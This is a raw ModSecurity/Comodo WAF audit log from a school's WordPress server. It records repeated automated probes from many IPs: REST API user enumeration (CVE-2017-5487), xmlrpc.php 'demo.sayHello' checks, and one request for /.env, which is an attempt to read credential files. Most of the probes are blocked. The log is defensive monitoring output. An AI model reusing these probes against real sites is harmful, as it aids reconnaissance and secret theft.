HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7df58e23-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435845682342 5140 (- - -) Stopwatch2: 1747435845682342 5140; combined=3925, p1=479, p2=3240, p3=25, p4=31, p5=89, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7df58e23-Z-- --15996653-A-- [17/May/2025:05:51:27 +0700] aCfBbwTOsBn9MSWb6WJtxgAAAIg 103.236.140.4 41618 103.236.140.4 8181 --15996653-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15996653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15996653-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435887634981 3518 (- - -) Stopwatch2: 1747435887634981 3518; combined=1483, p1=507, p2=945, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15996653-Z-- --dfa40c04-A-- [17/May/2025:05:51:32 +0700] aCfBdBKi5m5upc8uMd6hiAAAANc 103.236.140.4 41622 103.236.140.4 8181 --dfa40c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dfa40c04-C-- demo.sayHello --dfa40c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfa40c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435892741919 6050 (- - -) Stopwatch2: 1747435892741919 6050; combined=4323, p1=546, p2=3546, p3=30, p4=34, p5=98, sr=94, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfa40c04-Z-- --f2beb26b-A-- [17/May/2025:05:53:26 +0700] aCfB5um4kjNN-hEbWjI_-AAAAFE 103.236.140.4 41648 103.236.140.4 8181 --f2beb26b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2beb26b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2beb26b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436006275792 3452 (- - -) Stopwatch2: 1747436006275792 3452; combined=1472, p1=493, p2=947, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2beb26b-Z-- --02dd945d-A-- [17/May/2025:05:53:31 +0700] aCfB6-m4kjNN-hEbWjI_-QAAAFI 103.236.140.4 41652 103.236.140.4 8181 --02dd945d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02dd945d-C-- demo.sayHello --02dd945d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02dd945d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436011203639 5032 (- - -) Stopwatch2: 1747436011203639 5032; combined=3770, p1=463, p2=3094, p3=22, p4=24, p5=97, sr=65, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02dd945d-Z-- --737e2b5f-A-- [17/May/2025:05:54:17 +0700] aCfCGRKi5m5upc8uMd6hjgAAAMU 103.236.140.4 41692 103.236.140.4 8181 --737e2b5f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 138.68.86.32 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 138.68.86.32 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --737e2b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --737e2b5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747436057073585 656 (- - -) Stopwatch2: 1747436057073585 656; combined=259, p1=230, p2=0, p3=0, p4=0, p5=29, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --737e2b5f-Z-- --c4d08758-A-- [17/May/2025:05:54:29 +0700] aCfCJem4kjNN-hEbWjJACgAAAFY 103.236.140.4 41698 103.236.140.4 8181 --c4d08758-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c4d08758-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4d08758-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436069802805 3401 (- - -) Stopwatch2: 1747436069802805 3401; combined=1473, p1=495, p2=942, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4d08758-Z-- --344d6752-A-- [17/May/2025:05:54:34 +0700] aCfCKum4kjNN-hEbWjJADAAAAFg 103.236.140.4 41702 103.236.140.4 8181 --344d6752-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --344d6752-C-- demo.sayHello --344d6752-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --344d6752-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436074712775 6938 (- - -) Stopwatch2: 1747436074712775 6938; combined=4897, p1=631, p2=3999, p3=43, p4=43, p5=108, sr=82, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --344d6752-Z-- --a09f625d-A-- [17/May/2025:05:56:36 +0700] aCfCpOm4kjNN-hEbWjJAEAAAAEg 103.236.140.4 41714 103.236.140.4 8181 --a09f625d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a09f625d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a09f625d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436196636885 2822 (- - -) Stopwatch2: 1747436196636885 2822; combined=1235, p1=435, p2=768, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a09f625d-Z-- --935e1549-A-- [17/May/2025:05:56:41 +0700] aCfCqem4kjNN-hEbWjJAEgAAAEo 103.236.140.4 41718 103.236.140.4 8181 --935e1549-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --935e1549-C-- demo.sayHello --935e1549-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --935e1549-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436201626068 4962 (- - -) Stopwatch2: 1747436201626068 4962; combined=3868, p1=478, p2=3168, p3=28, p4=25, p5=98, sr=91, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --935e1549-Z-- --8b09727e-A-- [17/May/2025:05:57:32 +0700] aCfC3BKi5m5upc8uMd6hjwAAAMg 103.236.140.4 41730 103.236.140.4 8181 --8b09727e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b09727e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b09727e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436252859857 2461 (- - -) Stopwatch2: 1747436252859857 2461; combined=1095, p1=377, p2=693, p3=0, p4=0, p5=24, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b09727e-Z-- --3dcce634-A-- [17/May/2025:05:57:37 +0700] aCfC4em4kjNN-hEbWjJAFgAAAFM 103.236.140.4 41734 103.236.140.4 8181 --3dcce634-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3dcce634-C-- demo.sayHello --3dcce634-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dcce634-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436257884057 6793 (- - -) Stopwatch2: 1747436257884057 6793; combined=4785, p1=690, p2=3868, p3=44, p4=45, p5=82, sr=144, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dcce634-Z-- --ecb8a44d-A-- [17/May/2025:05:57:44 +0700] aCfC6Om4kjNN-hEbWjJAGAAAAFY 103.236.140.4 41738 103.236.140.4 8181 --ecb8a44d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ecb8a44d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecb8a44d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436264276537 3546 (- - -) Stopwatch2: 1747436264276537 3546; combined=1471, p1=501, p2=938, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecb8a44d-Z-- --aeb45625-A-- [17/May/2025:05:57:51 +0700] aCfC7-m4kjNN-hEbWjJAGQAAAFc 103.236.140.4 41742 103.236.140.4 8181 --aeb45625-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aeb45625-C-- demo.sayHello --aeb45625-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeb45625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436271100674 5805 (- - -) Stopwatch2: 1747436271100674 5805; combined=4179, p1=550, p2=3398, p3=32, p4=32, p5=98, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb45625-Z-- --3057f92d-A-- [17/May/2025:05:59:27 +0700] aCfDT-m4kjNN-hEbWjJAHAAAAEE 103.236.140.4 41754 103.236.140.4 8181 --3057f92d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3057f92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3057f92d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436367153003 3609 (- - -) Stopwatch2: 1747436367153003 3609; combined=1617, p1=510, p2=996, p3=0, p4=0, p5=111, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3057f92d-Z-- --a3096717-A-- [17/May/2025:05:59:32 +0700] aCfDVOm4kjNN-hEbWjJAHgAAAEY 103.236.140.4 41758 103.236.140.4 8181 --a3096717-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3096717-C-- demo.sayHello --a3096717-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3096717-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436372188886 19218 (- - -) Stopwatch2: 1747436372188886 19218; combined=29636, p1=699, p2=3927, p3=37, p4=40, p5=12497, sr=177, sw=73, l=0, gc=12363 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3096717-Z-- --da061b20-A-- [17/May/2025:06:01:08 +0700] aCfDtOm4kjNN-hEbWjJAIgAAAE0 103.236.140.4 41772 103.236.140.4 8181 --da061b20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da061b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da061b20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436468560638 3489 (- - -) Stopwatch2: 1747436468560638 3489; combined=1506, p1=529, p2=939, p3=0, p4=0, p5=37, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da061b20-Z-- --44008e27-A-- [17/May/2025:06:01:12 +0700] aCfDuOm4kjNN-hEbWjJAJQAAAFA 103.236.140.4 41780 103.236.140.4 8181 --44008e27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --44008e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44008e27-H-- Message: Access denied 